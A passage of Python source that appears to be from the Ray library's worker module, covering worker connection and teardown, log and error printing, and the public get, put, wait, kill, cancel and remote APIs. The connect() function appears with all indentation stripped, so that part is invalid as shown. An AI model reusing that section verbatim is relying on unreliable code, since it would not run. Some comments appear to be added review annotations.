    target = sys.stderr if data["is_err"] else sys.stdout
    print_worker_logs(data, target)
# Start time of this process, used for relative time logs.
t0 = time.time()

# Set to True once the one-time "Tip:" message about autoscaler events has
# been yielded by filter_autoscaler_events(), so it is printed only once.
autoscaler_log_fyi_printed = False
def filter_autoscaler_events(lines: List[str]) -> Iterator[str]:
    """Yield only autoscaler event summaries from raw monitor log lines.

    Autoscaler events are denoted by the ":event_summary:" magic token;
    every other line is dropped. A one-time usage tip is emitted before the
    first event.
    """
    global autoscaler_log_fyi_printed
    if not AUTOSCALER_EVENTS:
        return
    token = ":event_summary:"
    # Keep only autoscaler events, ignoring other messages.
    for raw_line in lines:
        if token not in raw_line:
            continue
        if not autoscaler_log_fyi_printed:
            yield ("Tip: use `ray status` to view detailed "
                   "autoscaling status. To disable autoscaler event "
                   "messages, you can set AUTOSCALER_EVENTS=0.")
            autoscaler_log_fyi_printed = True
        # The event text immediately follows the magic token.
        yield raw_line.split(token)[1]
def time_string() -> str:
    """Return the relative time from the start of this job.

    For example, 15m30s. Hours and minutes are omitted when zero; seconds
    are always shown (truncated to an integer).
    """
    delta = time.time() - t0
    # Fix/idiom: divmod replaces the original repeated-subtraction loops.
    # Besides being O(1), it corrects the strict-inequality boundary bug
    # where an elapsed time of exactly 3600s rendered as "59m60s" instead
    # of "1h0s" (and 60s as "60s" instead of "1m0s").
    hours, remainder = divmod(delta, 3600)
    minutes, seconds = divmod(remainder, 60)
    output = ""
    if hours:
        output += "{}h".format(int(hours))
    if minutes:
        output += "{}m".format(int(minutes))
    output += "{}s".format(int(seconds))
    return output
def print_worker_logs(data: Dict[str, str], print_file: Any):
    """Pretty-print one batch of worker log lines to the given file.

    Each line is prefixed with a dim, colored "(pid=..., ip=...)" tag; the
    ip suffix is omitted when the record comes from the local host.
    Autoscaler records are reduced to event summaries first.
    """

    def prefix_for(data: Dict[str, str]) -> str:
        """The PID prefix for this log line."""
        return "" if data["pid"] in ["autoscaler", "raylet"] else "pid="

    def color_for(data: Dict[str, str]) -> str:
        """The color for this log line."""
        if data["pid"] == "raylet":
            return colorama.Fore.YELLOW
        if data["pid"] == "autoscaler":
            return colorama.Style.BRIGHT + colorama.Fore.CYAN
        return colorama.Fore.CYAN

    if data["pid"] == "autoscaler":
        pid = "{} +{}".format(data["pid"], time_string())
        lines = filter_autoscaler_events(data["lines"])
    else:
        pid = data["pid"]
        lines = data["lines"]
    is_local = data["ip"] == data["localhost"]
    for line in lines:
        if is_local:
            print(
                "{}{}({}{}){} {}".format(colorama.Style.DIM, color_for(data),
                                         prefix_for(data), pid,
                                         colorama.Style.RESET_ALL, line),
                file=print_file)
        else:
            print(
                "{}{}({}{}, ip={}){} {}".format(
                    colorama.Style.DIM, color_for(data), prefix_for(data),
                    pid, data["ip"], colorama.Style.RESET_ALL, line),
                file=print_file)
def listen_error_messages_raylet(worker, threads_stopped):
    """Listen to error messages in the background on the driver.

    This runs in a separate thread on the driver and pushes (error, time)
    tuples to the output queue.

    Args:
        worker: The worker class that this thread belongs to.
        threads_stopped (threading.Event): A threading event used to signal to
            the thread that it should exit.
    """
    worker.error_message_pubsub_client = worker.redis_client.pubsub(
        ignore_subscribe_messages=True)
    # Exports that are published after the call to
    # error_message_pubsub_client.subscribe and before the call to
    # error_message_pubsub_client.listen will still be processed in the loop.
    # Really we should just subscribe to the errors for this specific job.
    # However, currently all errors seem to be published on the same channel.
    error_pubsub_channel = ray.gcs_utils.RAY_ERROR_PUBSUB_PATTERN
    worker.error_message_pubsub_client.psubscribe(error_pubsub_channel)
    try:
        if _internal_kv_initialized():
            # Get any autoscaler errors that occurred before the call to
            # subscribe.
            error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
            if error_message is not None:
                logger.warning(error_message.decode())
        while True:
            # Exit if we received a signal that we should stop.
            if threads_stopped.is_set():
                return
            msg = worker.error_message_pubsub_client.get_message()
            if msg is None:
                # No message pending; sleep briefly (interruptibly via the
                # stop event) before polling again.
                threads_stopped.wait(timeout=0.01)
                continue
            pubsub_msg = ray.gcs_utils.PubSubMessage.FromString(msg["data"])
            error_data = ray.gcs_utils.ErrorTableData.FromString(
                pubsub_msg.data)
            job_id = error_data.job_id
            # Only surface errors for our own job (or job-less errors,
            # which carry the nil job id).
            if job_id not in [
                    worker.current_job_id.binary(),
                    JobID.nil().binary(),
            ]:
                continue
            error_message = error_data.error_message
            if (error_data.type == ray_constants.TASK_PUSH_ERROR):
                # TODO(ekl) remove task push errors entirely now that we have
                # the separate unhandled exception handler.
                pass
            else:
                logger.warning(error_message)
    except (OSError, redis.exceptions.ConnectionError) as e:
        logger.error(f"listen_error_messages_raylet: {e}")
    finally:
        # Close the pubsub client to avoid leaking file descriptors.
        worker.error_message_pubsub_client.close()
@PublicAPI
@client_mode_hook
def is_initialized():
    """Check whether ray.init has been called yet.

    Returns:
        True if ray.init has already been called and false otherwise.
    """
    worker_is_connected = ray.worker.global_worker.connected
    return worker_is_connected
def connect(node,
mode=WORKER_MODE,
log_to_driver=False,
worker=global_worker,
driver_object_store_memory=None,
job_id=None,
namespace=None,
job_config=None,
runtime_env_hash=0,
runtime_env_json="{}",
worker_shim_pid=0,
ray_debugger_external=False):
"""Connect this worker to the raylet, to Plasma, and to Redis.
Args:
node (ray.node.Node): The node to connect.
mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE, and
LOCAL_MODE.
log_to_driver (bool): If true, then output from all of the worker
processes on all nodes will be directed to the driver.
worker: The ray.Worker instance.
driver_object_store_memory: Deprecated.
job_id: The ID of job. If it's None, then we will generate one.
job_config (ray.job_config.JobConfig): The job configuration.
runtime_env_hash (int): The hash of the runtime env for this worker.
worker_shim_pid (int): The PID of the process for setup worker
runtime env.
ray_debugger_host (bool): The host to bind a Ray debugger to on
this worker.
"""
# Do some basic checking to make sure we didn't call ray.init twice.
error_message = "Perhaps you called ray.init twice by accident?"
assert not worker.connected, error_message
assert worker.cached_functions_to_run is not None, error_message
# Enable nice stack traces on SIGSEGV etc.
try:
if not faulthandler.is_enabled():
faulthandler.enable(all_threads=False)
except io.UnsupportedOperation:
pass # ignore
# Create a Redis client to primary.
# The Redis client can safely be shared between threads. However,
# that is not true of Redis pubsub clients. See the documentation at
# https://github.com/andymccurdy/redis-py#thread-safety.
worker.redis_client = node.create_redis_client()
ray.state.state._initialize_global_state(
node.redis_address, redis_password=node.redis_password)
# Initialize some fields.
if mode in (WORKER_MODE, RESTORE_WORKER_MODE, SPILL_WORKER_MODE,
UTIL_WORKER_MODE):
# We should not specify the job_id if it's `WORKER_MODE`.
assert job_id is None
job_id = JobID.nil()
else:
# This is the code path of driver mode.
if job_id is None:
job_id = ray.state.next_job_id()
if mode is not SCRIPT_MODE and mode is not LOCAL_MODE and setproctitle:
process_name = ray_constants.WORKER_PROCESS_TYPE_IDLE_WORKER
if mode is SPILL_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_SPILL_WORKER_IDLE)
elif mode is RESTORE_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_RESTORE_WORKER_IDLE)
setproctitle.setproctitle(process_name)
if not isinstance(job_id, JobID):
raise TypeError("The type of given job id must be JobID.")
# All workers start out as non-actors. A worker can be turned into an actor
# after it is created.
worker.node = node
worker.set_mode(mode)
# For driver's check that the version information matches the version
# information that the Ray cluster was started with.
try:
ray._private.services.check_version_info(worker.redis_client)
except Exception as e:
if mode == SCRIPT_MODE:
raise e
elif mode == WORKER_MODE:
traceback_str = traceback.format_exc()
ray._private.utils.push_error_to_driver_through_redis(
worker.redis_client,
ray_constants.VERSION_MISMATCH_PUSH_ERROR,
traceback_str,
job_id=None)
worker.lock = threading.RLock()
driver_name = ""
log_stdout_file_path = ""
log_stderr_file_path = ""
interactive_mode = False
if mode == SCRIPT_MODE:
import __main__ as main
if hasattr(main, "__file__"):
driver_name = main.__file__
else:
interactive_mode = True
driver_name = "INTERACTIVE MODE"
elif not LOCAL_MODE:
raise ValueError(
"Invalid worker mode. Expected DRIVER, WORKER or LOCAL.")
redis_address, redis_port = node.redis_address.split(":")
gcs_options = ray._raylet.GcsClientOptions(
redis_address,
int(redis_port),
node.redis_password,
)
if job_config is None:
job_config = ray.job_config.JobConfig()
if namespace is not None:
# The namespace field of job config may have already been set in code
# paths such as the client.
job_config.set_ray_namespace(namespace)
# Make sure breakpoint() in the user's code will
# invoke the Ray debugger if we are in a worker or actor process
# (but not on the driver).
if mode == WORKER_MODE:
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb.set_trace"
worker.ray_debugger_external = ray_debugger_external
serialized_job_config = job_config.serialize()
worker.core_worker = ray._raylet.CoreWorker(
mode, node.plasma_store_socket_name, node.raylet_socket_name, job_id,
gcs_options, node.get_logs_dir_path(), node.node_ip_address,
node.node_manager_port, node.raylet_ip_address, (mode == LOCAL_MODE),
driver_name, log_stdout_file_path, log_stderr_file_path,
serialized_job_config, node.metrics_agent_port, runtime_env_hash,
worker_shim_pid)
worker.gcs_client = worker.core_worker.get_gcs_client()
# If it's a driver and it's not coming from ray client, we'll prepare the
# environment here. If it's ray client, the environmen will be prepared
# at the server side.
if mode == SCRIPT_MODE and not job_config.client_job:
runtime_env_pkg.upload_runtime_env_package_if_needed(job_config)
elif mode == WORKER_MODE:
# TODO(ekl) get rid of the env var hack and get runtime env from the
# task spec and/or job config only.
uris = []
global_job_config = worker.core_worker.get_job_config()
override_runtime_env = json.loads(runtime_env_json)
if os.environ.get("RAY_PACKAGING_URI"):
uris = [os.environ.get("RAY_PACKAGING_URI")]
if global_job_config.runtime_env.uris:
uris = global_job_config.runtime_env.uris
if override_runtime_env.get("uris"):
# TODO(simon): should we combine the uris from package and global
# job config if they are present?
uris = override_runtime_env["uris"]
working_dir = runtime_env_pkg.ensure_runtime_env_setup(uris)
if working_dir is not None:
os.chdir(working_dir)
# Notify raylet that the core worker is ready.
worker.core_worker.notify_raylet()
if driver_object_store_memory is not None:
logger.warning("`driver_object_store_memory` is deprecated"
" and will be removed in the future.")
# Start the import thread
if mode not in (RESTORE_WORKER_MODE, SPILL_WORKER_MODE, UTIL_WORKER_MODE):
worker.import_thread = import_thread.ImportThread(
worker, mode, worker.threads_stopped)
worker.import_thread.start()
# If this is a driver running in SCRIPT_MODE, start a thread to print error
# messages asynchronously in the background. Ideally the scheduler would
# push messages to the driver's worker service, but we ran into bugs when
# trying to properly shutdown the driver's worker service, so we are
# temporarily using this implementation which constantly queries the
# scheduler for new error messages.
if mode == SCRIPT_MODE:
worker.listener_thread = threading.Thread(
target=listen_error_messages_raylet,
name="ray_listen_error_messages",
args=(worker, worker.threads_stopped))
worker.listener_thread.daemon = True
worker.listener_thread.start()
if log_to_driver:
global_worker_stdstream_dispatcher.add_handler(
"ray_print_logs", print_to_stdstream)
worker.logger_thread = threading.Thread(
target=worker.print_logs, name="ray_print_logs")
worker.logger_thread.daemon = True
worker.logger_thread.start()
if mode == SCRIPT_MODE:
# Add the directory containing the script that is running to the Python
# paths of the workers. Also add the current directory. Note that this
# assumes that the directory structures on the machines in the clusters
# are the same.
# When using an interactive shell, there is no script directory.
if not interactive_mode:
script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, script_directory))
# In client mode, if we use runtime envs with "working_dir", then
# it'll be handled automatically. Otherwise, add the current dir.
if not job_config.client_job and len(
job_config.get_runtime_env_uris()) == 0:
current_directory = os.path.abspath(os.path.curdir)
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, current_directory))
# TODO(rkn): Here we first export functions to run, then remote
# functions. The order matters. For example, one of the functions to
# run may set the Python path, which is needed to import a module used
# to define a remote function. We may want to change the order to
# simply be the order in which the exports were defined on the driver.
# In addition, we will need to retain the ability to decide what the
# first few exports are (mostly to set the Python path). Additionally,
# note that the first exports to be defined on the driver will be the
# ones defined in separate modules that are imported by the driver.
# Export cached functions_to_run.
for function in worker.cached_functions_to_run:
worker.run_function_on_all_workers(function)
worker.cached_functions_to_run = None
# Setup tracing here
if _internal_kv_get("tracing_startup_hook"):
ray.util.tracing.tracing_helper._global_is_tracing_enabled = True
if not getattr(ray, "__traced__", False):
_setup_tracing = import_from_string(
_internal_kv_get("tracing_startup_hook").decode("utf-8"))
_setup_tracing()
ray.__traced__ = True
def disconnect(exiting_interpreter=False):
    """Disconnect this worker from the raylet and object store.

    Args:
        exiting_interpreter (bool): True when called during interpreter
            shutdown. Not read by this body; kept for callers that
            distinguish the two cases.
    """
    # Reset the list of cached remote functions and actors so that if more
    # remote functions or actors are defined and then connect is called again,
    # the remote functions will be exported. This is mostly relevant for the
    # tests.
    worker = global_worker
    if worker.connected:
        # Shutdown all of the threads that we've started. TODO(rkn): This
        # should be handled cleanly in the worker object's destructor and not
        # in this disconnect method.
        worker.threads_stopped.set()
        if hasattr(worker, "import_thread"):
            worker.import_thread.join_import_thread()
        if hasattr(worker, "listener_thread"):
            worker.listener_thread.join()
        if hasattr(worker, "logger_thread"):
            worker.logger_thread.join()
        # Clear the stop event so a later connect() can start threads again.
        worker.threads_stopped.clear()
        worker._session_index += 1

        global_worker_stdstream_dispatcher.remove_handler("ray_print_logs")

    worker.node = None  # Disconnect the worker from the node.
    worker.cached_functions_to_run = []
    worker.serialization_context_map.clear()
    try:
        ray_actor = ray.actor
    except AttributeError:
        ray_actor = None  # This can occur during program termination
    if ray_actor is not None:
        ray_actor.ActorClassMethodMetadata.reset_cache()
@contextmanager
def _changeproctitle(title, next_title):
    """Set the process title to ``title`` for the duration of the block,
    then change it to ``next_title`` on exit.

    The title is only touched when not running in LOCAL_MODE; the mode is
    re-checked on exit, matching the original behavior.
    """

    def _retitle(new_title):
        # Re-evaluate the mode each time rather than caching it.
        if _mode() is not LOCAL_MODE:
            setproctitle.setproctitle(new_title)

    _retitle(title)
    try:
        yield
    finally:
        _retitle(next_title)
@DeveloperAPI
def show_in_dashboard(message, key="", dtype="text"):
    """Display message in dashboard.

    Display message for the current task or actor in the dashboard.
    For example, this can be used to display the status of a long-running
    computation.

    Args:
        message (str): Message to be displayed.
        key (str): The key name for the message. Multiple message under
            different keys will be displayed at the same time. Messages
            under the same key will be overridden.
        dtype (str): The type of message for rendering. One of the
            following: text, html.
    """
    worker = global_worker
    worker.check_connected()

    acceptable_dtypes = {"text", "html"}
    # NOTE(review): assert is stripped under `python -O`; validation then
    # relies on the dashboard side tolerating unknown dtypes.
    assert dtype in acceptable_dtypes, (
        f"dtype accepts only: {acceptable_dtypes}")

    message_wrapped = {"message": message, "dtype": dtype}
    message_encoded = json.dumps(message_wrapped).encode()
    worker.core_worker.set_webui_display(key.encode(), message_encoded)
# Global variable to make sure we only send out the warning once.
blocking_get_inside_async_warned: bool = False
@PublicAPI
@client_mode_hook
def get(object_refs, *, timeout=None):
    """Get a remote object or a list of remote objects from the object store.

    This method blocks until the object corresponding to the object ref is
    available in the local object store. If this object is not in the local
    object store, it will be shipped from an object store that has it (once the
    object has been created). If object_refs is a list, then the objects
    corresponding to each object in the list will be returned.

    Ordering for an input list of object refs is preserved for each object
    returned. That is, if an object ref to A precedes an object ref to B in the
    input list, then A will precede B in the returned list.

    This method will issue a warning if it's running inside async context,
    you can use ``await object_ref`` instead of ``ray.get(object_ref)``. For
    a list of object refs, you can use ``await asyncio.gather(*object_refs)``.

    Args:
        object_refs: Object ref of the object to get or a list of object refs
            to get.
        timeout (Optional[float]): The maximum amount of time in seconds to
            wait before returning.

    Returns:
        A Python object or a list of Python objects.

    Raises:
        GetTimeoutError: A GetTimeoutError is raised if a timeout is set and
            the get takes longer than timeout to return.
        Exception: An exception is raised if the task that created the object
            or that created one of the objects raised an exception.
    """
    worker = global_worker
    worker.check_connected()

    # Warn (once per process) about blocking ray.get inside an async actor.
    if hasattr(
            worker,
            "core_worker") and worker.core_worker.current_actor_is_asyncio():
        global blocking_get_inside_async_warned
        if not blocking_get_inside_async_warned:
            logger.warning("Using blocking ray.get inside async actor. "
                           "This blocks the event loop. Please use `await` "
                           "on object ref with asyncio.gather if you want to "
                           "yield execution to the event loop instead.")
            blocking_get_inside_async_warned = True

    with profiling.profile("ray.get"):
        # Normalize a single ref to a one-element list; un-wrapped below.
        is_individual_id = isinstance(object_refs, ray.ObjectRef)
        if is_individual_id:
            object_refs = [object_refs]

        if not isinstance(object_refs, list):
            raise ValueError("'object_refs' must either be an object ref "
                             "or a list of object refs.")

        # TODO(ujvl): Consider how to allow user to retrieve the ready objects.
        values, debugger_breakpoint = worker.get_objects(
            object_refs, timeout=timeout)
        # Error values stored in the object store are re-raised here.
        for i, value in enumerate(values):
            if isinstance(value, RayError):
                if isinstance(value, ray.exceptions.ObjectLostError):
                    worker.core_worker.dump_object_store_memory_usage()
                if isinstance(value, RayTaskError):
                    raise value.as_instanceof_cause()
                else:
                    raise value

        if is_individual_id:
            values = values[0]

        # A non-empty breakpoint token means a remote task requested a
        # debugger session; attach the Ray debugger to the caller's frame.
        if debugger_breakpoint != b"":
            frame = sys._getframe().f_back
            rdb = ray.util.pdb.connect_ray_pdb(
                host=None,
                port=None,
                patch_stdstreams=False,
                quiet=None,
                breakpoint_uuid=debugger_breakpoint.decode()
                if debugger_breakpoint else None,
                debugger_external=worker.ray_debugger_external)
            rdb.set_trace(frame=frame)

        return values
@PublicAPI
@client_mode_hook
def put(value, *, _owner=None):
    """Store an object in the object store.

    The object may not be evicted while a reference to the returned ID exists.

    Args:
        value: The Python object to be stored.
        _owner: The actor that should own this object. This allows creating
            objects with lifetimes decoupled from that of the creating process.
            Note that the owner actor must be passed a reference to the object
            prior to the object creator exiting, otherwise the reference will
            still be lost.

    Returns:
        The object ref assigned to this value.

    Raises:
        TypeError: If ``_owner`` is neither None nor an ActorHandle.
        RuntimeError: If the owner actor is not alive.
    """
    worker = global_worker
    worker.check_connected()

    # Resolve the (optional) owner actor to a serialized worker address.
    if _owner is None:
        serialize_owner_address = None
    elif isinstance(_owner, ray.actor.ActorHandle):
        # Ensure `ray.state.state.global_state_accessor` is not None
        ray.state.state._check_connected()
        owner_address = ray.gcs_utils.ActorTableData.FromString(
            ray.state.state.global_state_accessor.get_actor_info(
                _owner._actor_id)).address
        # An empty worker_id means the actor process no longer exists.
        if len(owner_address.worker_id) == 0:
            raise RuntimeError(
                f"{_owner} is not alive, it's worker_id is empty!")
        serialize_owner_address = owner_address.SerializeToString()
    else:
        raise TypeError(
            f"Expect an `ray.actor.ActorHandle`, but got: {type(_owner)}")

    with profiling.profile("ray.put"):
        try:
            object_ref = worker.put_object(
                value, owner_address=serialize_owner_address)
        except ObjectStoreFullError:
            logger.info(
                "Put failed since the value was either too large or the "
                "store was full of pinned objects.")
            raise
        return object_ref
# Global variable to make sure we only send out the warning once.
blocking_wait_inside_async_warned: bool = False
@PublicAPI
@client_mode_hook
def wait(object_refs, *, num_returns=1, timeout=None, fetch_local=True):
    """Return a list of IDs that are ready and a list of IDs that are not.

    If timeout is set, the function returns either when the requested number of
    IDs are ready or when the timeout is reached, whichever occurs first. If it
    is not set, the function simply waits until that number of objects is ready
    and returns that exact number of object refs.

    This method returns two lists. The first list consists of object refs that
    correspond to objects that are available in the object store. The second
    list corresponds to the rest of the object refs (which may or may not be
    ready).

    Ordering of the input list of object refs is preserved. That is, if A
    precedes B in the input list, and both are in the ready list, then A will
    precede B in the ready list. This also holds true if A and B are both in
    the remaining list.

    This method will issue a warning if it's running inside an async context.
    Instead of ``ray.wait(object_refs)``, you can use
    ``await asyncio.wait(object_refs)``.

    Args:
        object_refs (List[ObjectRef]): List of object refs for objects that may
            or may not be ready. Note that these IDs must be unique.
        num_returns (int): The number of object refs that should be returned.
        timeout (float): The maximum amount of time in seconds to wait before
            returning.
        fetch_local (bool): If True, wait for the object to be downloaded onto
            the local node before returning it as ready. If False, ray.wait()
            will not trigger fetching of objects to the local node and will
            return immediately once the object is available anywhere in the
            cluster.

    Returns:
        A list of object refs that are ready and a list of the remaining object
        IDs.

    Raises:
        TypeError: If object_refs is not a list of ObjectRefs.
        ValueError: If timeout is negative, the refs are not unique, or
            num_returns is out of range.
    """
    worker = global_worker
    worker.check_connected()

    # Warn (once per process) about blocking ray.wait inside an async actor.
    # A timeout of exactly 0 is a non-blocking poll and is allowed silently.
    if hasattr(worker,
               "core_worker") and worker.core_worker.current_actor_is_asyncio(
               ) and timeout != 0:
        global blocking_wait_inside_async_warned
        if not blocking_wait_inside_async_warned:
            logger.debug("Using blocking ray.wait inside async method. "
                         "This blocks the event loop. Please use `await` "
                         "on object ref with asyncio.wait. ")
            blocking_wait_inside_async_warned = True

    if isinstance(object_refs, ObjectRef):
        raise TypeError(
            "wait() expected a list of ray.ObjectRef, got a single "
            "ray.ObjectRef")

    if not isinstance(object_refs, list):
        raise TypeError("wait() expected a list of ray.ObjectRef, "
                        f"got {type(object_refs)}")

    if timeout is not None and timeout < 0:
        raise ValueError("The 'timeout' argument must be nonnegative. "
                         f"Received {timeout}")

    for object_ref in object_refs:
        if not isinstance(object_ref, ObjectRef):
            raise TypeError("wait() expected a list of ray.ObjectRef, "
                            f"got list containing {type(object_ref)}")

    # NOTE: a second, redundant worker.check_connected() call used to sit
    # here; connectivity is already verified at the top of this function.
    # TODO(swang): Check main thread.
    with profiling.profile("ray.wait"):
        # TODO(rkn): This is a temporary workaround for
        # https://github.com/ray-project/ray/issues/997. However, it should be
        # fixed in Arrow instead of here.
        if len(object_refs) == 0:
            return [], []

        if len(object_refs) != len(set(object_refs)):
            raise ValueError("Wait requires a list of unique object refs.")
        if num_returns <= 0:
            raise ValueError(
                "Invalid number of objects to return %d." % num_returns)
        if num_returns > len(object_refs):
            raise ValueError("num_returns cannot be greater than the number "
                             "of objects provided to ray.wait.")

        # No timeout means "wait effectively forever" (10**6 seconds).
        timeout = timeout if timeout is not None else 10**6
        timeout_milliseconds = int(timeout * 1000)
        ready_ids, remaining_ids = worker.core_worker.wait(
            object_refs,
            num_returns,
            timeout_milliseconds,
            worker.current_task_id,
            fetch_local,
        )
        return ready_ids, remaining_ids
@PublicAPI
@client_mode_hook
def get_actor(name):
    """Get a handle to a named actor.

    Gets a handle to an actor with the given name. The actor must
    have been created with Actor.options(name="name").remote(). This
    works for both detached & non-detached actors.

    The name may carry a namespace prefix separated by "/" (only the first
    "/" is significant); without one, the empty namespace is used.

    Returns:
        ActorHandle to the actor.

    Raises:
        ValueError if the named actor does not exist.
    """
    if not name:
        raise ValueError("Please supply a non-empty value to get_actor")

    worker = global_worker
    worker.check_connected()

    # "ns/actor" -> ("ns", "/", "actor"); "actor" -> ("actor", "", "").
    head, sep, tail = name.partition("/")
    if sep:
        namespace, name = head, tail
    else:
        name, namespace = head, ""
    return worker.core_worker.get_named_actor_handle(name, namespace)
@PublicAPI
@client_mode_hook
def kill(actor, *, no_restart=True):
    """Kill an actor forcefully.

    This will interrupt any running tasks on the actor, causing them to fail
    immediately. ``atexit`` handlers installed in the actor will not be run.

    If you want to kill the actor but let pending tasks finish,
    you can call ``actor.__ray_terminate__.remote()`` instead to queue a
    termination task. Any ``atexit`` handlers installed in the actor *will*
    be run in this case.

    If the actor is a detached actor, subsequent calls to get its handle via
    ray.get_actor will fail.

    Args:
        actor (ActorHandle): Handle to the actor to kill.
        no_restart (bool): Whether or not this actor should be restarted if
            it's a restartable actor.
    """
    worker = global_worker
    worker.check_connected()
    # Only actor handles can be force-killed; anything else is a user error.
    if isinstance(actor, ray.actor.ActorHandle):
        worker.core_worker.kill_actor(actor._ray_actor_id, no_restart)
        return
    raise ValueError("ray.kill() only supported for actors. "
                     "Got: {}.".format(type(actor)))
@PublicAPI
@client_mode_hook
def cancel(object_ref, *, force=False, recursive=True):
    """Cancels a task according to the following conditions.

    If the specified task is pending execution, it will not be executed. If
    the task is currently executing, the behavior depends on the ``force``
    flag. When ``force=False``, a KeyboardInterrupt will be raised in Python
    and when ``force=True``, the executing task will immediately exit.
    If the task is already finished, nothing will happen.

    Only non-actor tasks can be canceled. Canceled tasks will not be
    retried (max_retries will not be respected).

    Calling ray.get on a canceled task will raise a TaskCancelledError or a
    WorkerCrashedError if ``force=True``.

    Args:
        object_ref (ObjectRef): ObjectRef returned by the task
            that should be canceled.
        force (boolean): Whether to force-kill a running task by killing
            the worker that is running the task.
        recursive (boolean): Whether to try to cancel tasks submitted by the
            task specified.

    Raises:
        TypeError: This is also raised for actor tasks.
    """
    worker = ray.worker.global_worker
    worker.check_connected()

    if not isinstance(object_ref, ray.ObjectRef):
        raise TypeError(
            "ray.cancel() only supported for non-actor object refs. "
            f"Got: {type(object_ref)}.")
    return worker.core_worker.cancel_task(object_ref, force, recursive)
def _mode(worker=global_worker):
    """This is a wrapper around worker.mode.

    We use this wrapper so that in the remote decorator, we can call _mode()
    instead of worker.mode. The difference is that when we attempt to
    serialize remote functions, we don't attempt to serialize the worker
    object, which cannot be serialized.

    NOTE: the default argument binds the module-level `global_worker` at
    definition time; that is intentional, since there is one global worker
    per process.
    """
    return worker.mode
def make_decorator(num_returns=None,
                   num_cpus=None,
                   num_gpus=None,
                   memory=None,
                   object_store_memory=None,
                   resources=None,
                   accelerator_type=None,
                   max_calls=None,
                   max_retries=None,
                   max_restarts=None,
                   max_task_retries=None,
                   runtime_env=None,
                   worker=None):
    """Build the decorator applied by ``@ray.remote``.

    Returns a decorator that validates the supplied options against the
    decorated target (function vs. class) and wraps it in a RemoteFunction
    or actor class, respectively.

    Raises:
        ValueError: If an option value is out of range for the target kind.
        TypeError: If an option is not applicable to the target kind, or the
            target is neither a function nor a class.
    """

    def decorator(function_or_class):
        # Plain functions and Cython functions become remote functions.
        if (inspect.isfunction(function_or_class)
                or is_cython(function_or_class)):
            # Set the remote function default resources.
            # Actor-only options are rejected for functions.
            if max_restarts is not None:
                raise ValueError("The keyword 'max_restarts' is not "
                                 "allowed for remote functions.")
            if max_task_retries is not None:
                raise ValueError("The keyword 'max_task_retries' is not "
                                 "allowed for remote functions.")
            if num_returns is not None and (not isinstance(num_returns, int)
                                            or num_returns < 0):
                raise ValueError(
                    "The keyword 'num_returns' only accepts 0 or a"
                    " positive integer")
            # -1 means unlimited retries.
            if max_retries is not None and (not isinstance(max_retries, int)
                                            or max_retries < -1):
                raise ValueError(
                    "The keyword 'max_retries' only accepts 0, -1 or a"
                    " positive integer")
            if max_calls is not None and (not isinstance(max_calls, int)
                                          or max_calls < 0):
                raise ValueError(
                    "The keyword 'max_calls' only accepts 0 or a positive"
                    " integer")
            return ray.remote_function.RemoteFunction(
                Language.PYTHON, function_or_class, None, num_cpus, num_gpus,
                memory, object_store_memory, resources, accelerator_type,
                num_returns, max_calls, max_retries, runtime_env)

        # Classes become actor classes.
        if inspect.isclass(function_or_class):
            # Function-only options are rejected for actors.
            if num_returns is not None:
                raise TypeError("The keyword 'num_returns' is not "
                                "allowed for actors.")
            if max_calls is not None:
                raise TypeError("The keyword 'max_calls' is not "
                                "allowed for actors.")
            # -1 means restart / retry indefinitely.
            if max_restarts is not None and (not isinstance(max_restarts, int)
                                             or max_restarts < -1):
                raise ValueError(
                    "The keyword 'max_restarts' only accepts -1, 0 or a"
                    " positive integer")
            if max_task_retries is not None and (not isinstance(
                    max_task_retries, int) or max_task_retries < -1):
                raise ValueError(
                    "The keyword 'max_task_retries' only accepts -1, 0 or a"
                    " positive integer")
            return ray.actor.make_actor(function_or_class, num_cpus, num_gpus,
                                        memory, object_store_memory, resources,
                                        accelerator_type, max_restarts,
                                        max_task_retries, runtime_env)

        raise TypeError("The @ray.remote decorator must be applied to "
                        "either a function or to a class.")

    return decorator
@PublicAPI
def remote(*args, **kwargs):
    """Defines a remote function or an actor class.

    This can be used with no arguments to define a remote function or actor as
    follows:

    .. code-block:: python

        @ray.remote
        def f():
            return 1

        @ray.remote
        class Foo:
            def method(self):
                return 1

    It can also be used with specific keyword arguments as follows:

    .. code-block:: python

        @ray.remote(num_gpus=1, max_calls=1, num_returns=2)
        def f():
            return 1, 2

        @ray.remote(num_cpus=2, resources={"CustomResource": 1})
        class Foo:
            def method(self):
                return 1

    Remote task and actor objects returned by @ray.remote can also be
    dynamically modified with the same arguments as above using
    ``.options()`` as follows:

    .. code-block:: python

        @ray.remote(num_gpus=1, max_calls=1, num_returns=2)
        def f():
            return 1, 2
        g = f.options(num_gpus=2, max_calls=None)

        @ray.remote(num_cpus=2, resources={"CustomResource": 1})
        class Foo:
            def method(self):
                return 1
        Bar = Foo.options(num_cpus=1, resources=None)

    Running remote actors will be terminated when the actor handle to them
    in Python is deleted, which will cause them to complete any outstanding
    work and then shut down. If you want to kill them immediately, you can
    also call ``ray.kill(actor)``.

    Args:
        num_returns (int): This is only for *remote functions*. It specifies
            the number of object refs returned by
            the remote function invocation.
        num_cpus (float): The quantity of CPU cores to reserve
            for this task or for the lifetime of the actor.
        num_gpus (int): The quantity of GPUs to reserve
            for this task or for the lifetime of the actor.
        resources (Dict[str, float]): The quantity of various custom resources
            to reserve for this task or for the lifetime of the actor.
            This is a dictionary mapping strings (resource names) to floats.
        accelerator_type: If specified, requires that the task or actor run
            on a node with the specified type of accelerator.
            See `ray.accelerators` for accelerator types.
        max_calls (int): Only for *remote functions*. This specifies the
            maximum number of times that a given worker can execute
            the given remote function before it must exit
            (this can be used to address memory leaks in third-party
            libraries or to reclaim resources that cannot easily be
            released, e.g., GPU memory that was acquired by TensorFlow).
            By default this is infinite.
        max_restarts (int): Only for *actors*. This specifies the maximum
            number of times that the actor should be restarted when it dies
            unexpectedly. The minimum valid value is 0 (default),
            which indicates that the actor doesn't need to be restarted.
            A value of -1 indicates that an actor should be restarted
            indefinitely.
        max_task_retries (int): Only for *actors*. How many times to
            retry an actor task if the task fails due to a system error,
            e.g., the actor has died. If set to -1, the system will
